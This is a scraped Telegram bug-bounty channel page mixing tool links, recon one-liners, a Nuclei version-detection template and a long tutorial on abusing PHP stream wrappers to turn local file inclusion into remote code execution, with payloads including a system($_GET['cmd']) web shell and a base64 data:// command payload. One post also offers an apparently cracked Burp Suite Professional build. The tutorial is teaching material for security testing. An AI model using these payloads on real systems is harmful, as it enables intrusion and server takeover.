bugbounty_tech | Unsorted

Telegram-канал bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Subscribe to a channel

Bug bounty Tips

guys after a long time i created a web app to play a suduko game

check out the repo and let me know

https://github.com/Addy-shetty/Suduko_to_play

Читать полностью…

Bug bounty Tips

HTB- ALL modules

Run:

python -m http.server 8000


to view clear html pages in localhost:8000

Читать полностью…

Bug bounty Tips

https://www.bugbountyhunting.com/

Читать полностью…

Bug bounty Tips

https://github.com/sanjai-AK47/ShodanX

Читать полностью…

Bug bounty Tips

🚀 Exciting News for #InfoSec & #BugBounty! 🛡

ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥

✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private

Open-Source : https://github.com/aacle/ProxSec

Feedback welcome! 💬

Читать полностью…

Bug bounty Tips

https://pocorexp.nsa.im
lists all CVEs and public exploit

Читать полностью…

Bug bounty Tips

a simple dork that find every VDP in worl wide 😎

body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443"

credit: http://x.com/darkshadow2bd

Читать полностью…

Bug bounty Tips

▶️Fresh BB Target - https://lormadetails.com/.well-known/security.txt

Читать полностью…

Bug bounty Tips

🔖Sorting subdomains into different files based on status code, server type, and vhosts.

cat domains.txt | httpx -server -vhost -sc > httpx-output.txt


Now, use the following awk script to categorize the results:
awk '{gsub(/\x1b\[[0-9;]*m/, ""); status=$2; gsub(/[\[\]]/, "", status); server=$3; gsub(/[\[\]]/, "", server); safe_server=server; gsub(/[^a-zA-Z0-9_-]/, "_", safe_server); main_server=server; sub(/\/.*/, "", main_server); gsub(/[^a-zA-Z0-9_-]/, "_", main_server); vhost=$4; gsub(/[\[\]]/, "", vhost); if (server=="") print > "server-not-specified.txt"; else {print > (safe_server ".txt"); print > (main_server ".txt");} if (vhost=="vhost") print > "vhost.txt";}' httpx-output.txt

#InfoSec#CyberSecurity#Hacking#httpx#bugbounty#bugbountytips#bugbountyTools🔹 Share & Support Us 🔹

Читать полностью…

Bug bounty Tips

🔐 Breaking APIs: An Offensive API Pentesting Course

🎓 Course Content:

1. 🚀 Introduction
2. 📚 What is API Pentesting?
3. 🧪 Lab Setup
4. 🛠 Tools Setup
5. 🔍 Active and Passive Recon
6. 🔑 API Endpoint Analysis
7. ⚔️ BOLA
8. 🔓 Broken Authentication
9. 🛡 BFLA
10. 🕵️ SSRF
11. 📊 Excessive Data Exposure
12. 📈 Lack of Resource and Rate Limiting
13. 📦 Mass Assignment
14. 💉 Injection Attacks
15. 🏗 Improper Asset Management
16. 🔧 Security Misconfigurations
17. 📝 Insufficient Logging and Monitoring
18. 🎁 Bonus Lecture

✅ Why Enroll?

- ⏰ 5+ hours of in-depth content, including labs.
- 🔬 Hands-on exercises to reinforce key concepts and techniques.
- 📝 Quizzes and tasks to ensure you master API pentesting skills.

🔗 Link :- https://www.udemy.com/course/breaking-apis-an-offensive-api-pentesting-course/?referralCode=F7408590E13C6D21428B

💵 30-day money-back guarantee!

🧑‍🎓Keep Learning and Exploring

Читать полностью…

Bug bounty Tips

https://gowsundar.gitbook.io/book-of-bugbounty-tips

Читать полностью…

Bug bounty Tips

Burp Suite Professional v2024.5 + BurpBounty_Pro 2.8.0 + JDK 22

pass: 311138

README (en+ru) inside, plz read it before run BS.

Happy Hacking! 🥳

Run with Java SE JDK 22

Читать полностью…

Bug bounty Tips

A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.

https://github.com/ifconfig-me/SQLi-Scanner

Читать полностью…

Bug bounty Tips

👻New BB Target - https://www.brilliantdirectories.com/security-bounty

Читать полностью…

Bug bounty Tips

Anyone looking for a internship in USA try this..

Читать полностью…

Bug bounty Tips

https://beerus11.medium.com/redis-internals-and-use-cases-the-definitive-guide-4bab3b7faf11

Читать полностью…

Bug bounty Tips

This is my suggestion on who ever needs to start in cybersecurity a 6month plan

Читать полностью…

Bug bounty Tips

https://github.com/kh4sh3i/Application-Security-Interview-Questions

Читать полностью…

Bug bounty Tips

Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory

https://blog.huntr.com/spotlight-taiphung217-five-month-huntr-leaderboard-climb

Читать полностью…

Bug bounty Tips

guys this is an updating blog of cipherops if u need anything you guys can go and check here if possible i would like to update 2vice in a week

https://cipherops.gitbook.io/bug-bounty-notes

Читать полностью…

Bug bounty Tips

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE

⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇

🎯 Why PHP Wrappers Matter in Bug Bounty

PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.


As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior

Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://

🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.

Payload:
php://filter/read=convert.base64-encode/resource=index


Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source

Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config

Decode result:
echo 'PD9waHAK...base64...' | base64 -d

Now you see source code, credentials, internal logic, API keys, etc.

🔧 Other Useful PHP Wrappers

1️⃣ php://input

Reads raw POST data.
Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>

Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>

✅ Shell access via cmd parameter.

2️⃣ expect:// (if available)

Allows direct execution of system commands.
include('expect://ls');

⚠️ Rare but deadly if enabled.

3️⃣ data://

Inline file input using base64 or plaintext.

Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');

🟡 Executes: system('whoami')

4️⃣ zip://

✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.

Structure:
zip://path/to/archive.zip#file_inside.txt

Use this with file upload + LFI combo.

5️⃣ phar://

Deserializes metadata → use with Object Injection + LFI.

Upload malicious PHAR:
phar://path/to/phar_file

If unserialize() is called on a phar wrapper, it can lead to RCE.


🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php


Watch for:

200 → exists and renders
403/302 → access denied, but still includable via LFI


📁 Standard Inclusion vs. Filtered Inclusion

Including via:
?file=config

🟡 Executes file, no output if file has no HTML.

Using filter:
?file=php://filter/read=convert.base64-encode/resource=config

🟡 Returns base64 source code.


🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d


Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys


💣 Advanced Chaining → From LFI to RCE

Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE

This chain has been used in real-world bounty reports.

🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns


🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs

👍 Like this post if it helped
🔁 Share to boost your hacker circle

🔗 Github link : github.com/cybersecplayground...

#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground

Читать полностью…

Bug bounty Tips

https://soltanali0.medium.com/bypassing-origin-checks-using-trailing-dot-trick-a65007041d3a

http://GitBook_s.t.me

Читать полностью…

Bug bounty Tips

Nuclei template to find outdated software:

id: outdated-software-detectioninfo:


  name: Outdated Software Detection

  author: pentester_x

  severity: low

  description: |

    Detects outdated software versions by extracting version information from headers, scripts, and stylesheets.reference:

    - https://nvd.nist.gov/vuln/search

    - https://www.cvedetails.com

    - https://www.exploit-db.com

    - https://cve.mitre.orgtags: outdated,software,vulnerable,version,cverequests:

  - method: GET

    path:

      - "{{BaseURL}}"

      - "{{BaseURL}}/version"

      - "{{BaseURL}}/status"

      - "{{BaseURL}}/server-info"

      - "{{BaseURL}}/api/version"

      - "{{BaseURL}}/v1/info"

      - "{{BaseURL}}/robots.txt"matchers:

      - type: regex

        part: header

        regex:

          - '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'

          - '(?i)(\b\d+\.\d+\.\d+\b)'extractors:

      - type: regex

        name: software_version

        group: 3

        part: header

        regex:

          - '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'

      - type: regex

        name: software_version

        regex:

          - '(?i)v?(?:ersion)?[\s:]*(\d+\.\d+\.\d+)'- method: GET

    path:

      - "{{BaseURL}}/static/main.js"

      - "{{BaseURL}}/css/styles.css"

      - "{{BaseURL}}/app/build.js"

      - "{{BaseURL}}/assets/scripts.js"matchers:

      - type: regex

        regex:

          - '(?i)v?\d+\.\d+\.\d+'

          - '@version\s+\d+\.\d+\.\d+'extractors:

      - type: regex

        name: software_version

        regex:

          - '(?i)v?(\d+\.\d+\.\d+)'

          - '@version\s+(\d+\.\d+\.\d+)'



#infosec#cybersecurity#bugbounty#pentest#bugbountyTips#JS#Nuclei

Читать полностью…

Bug bounty Tips

one of the best blog to use for bugbounty and make it more better with AI

if you guys liked it give me a reaction

https://blog.ethiack.com/blog/supercharging-bug-bounty-hunting-with-ai

Читать полностью…

Bug bounty Tips

https://github.com/TrshPuppy/PNPT-study-guide

Читать полностью…

Bug bounty Tips

🐲 Kali Linux Cheat Sheet.

➡Recon and Enumeration;
➡Python Local Web Server;
➡Mounting File Shares;
➡Basic FingerPrinting;
➡SNMP Enumeration;
➡DNS Zone Transfers;
➡DNSRecon;
➡HTTP / HTTPS Webserver Enumeration;
➡Packet Inspection;
➡Username Enumeration;
➡Passwords;
➡Brute Forcing Services;
➡Password Cracking;
➡Exploit Research;
➡Compiling Exploits;
➡SUID Binary;
➡TTY Shells;
➡Metasploit;
➡Networking;
➡IPv4;
➡ASCII Table Cheat Sheet;
➡Cisco IOS Commands.

➡️ https://github.com/NoorQureshi/kali-linux-cheatsheet


Linux Network Commands Cheat Sheet;
RedHat Linux Commands Cheat Sheet;
Linux Ubuntu Commands Cheat Sheet;
Oracle Linux Cheat Sheet;
Centos Cheat Sheet;
Arch Linux Cheat Sheet;
Basic Linux Commands Cheat Sheet;
Advanced Linux Commands Cheat Sheet;
Linux Commands Cheat Sheet for DevOps;
Kali Linux Commands Cheat Sheet;
Linux Network Commands Cheat Sheet;
Linux to Windows Commands Cheat Sheet.

●▬۩❁ @geeekgirl ❁۩▬●

Читать полностью…

Bug bounty Tips

🌀Download all bug bounty programs domains in scope items 🎯

😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥

👇🏼Step 1: Download the domains.txt file

📂step 2: Extract only main/root domains

`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`

📂Step 3: Extract all IP addresses:

`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`

Don't forget to give reactions❤️

Читать полностью…

Bug bounty Tips

Challenge: Identify 2 security risks and improve error handling.

Читать полностью…

Bug bounty Tips

Comolho.com is a great bug bounty platform, only if you want to hack on Indian websites.
- Low bounty
- Slow response
- Bad UI

- Indian programs
- Good for beginners

Here you can hunt for learning not for big bounties.

Читать полностью…

Bug bounty Tips

https://x.com/CtPrecious/status/1900288792356913315?s=35

Читать полностью…
Subscribe to a channel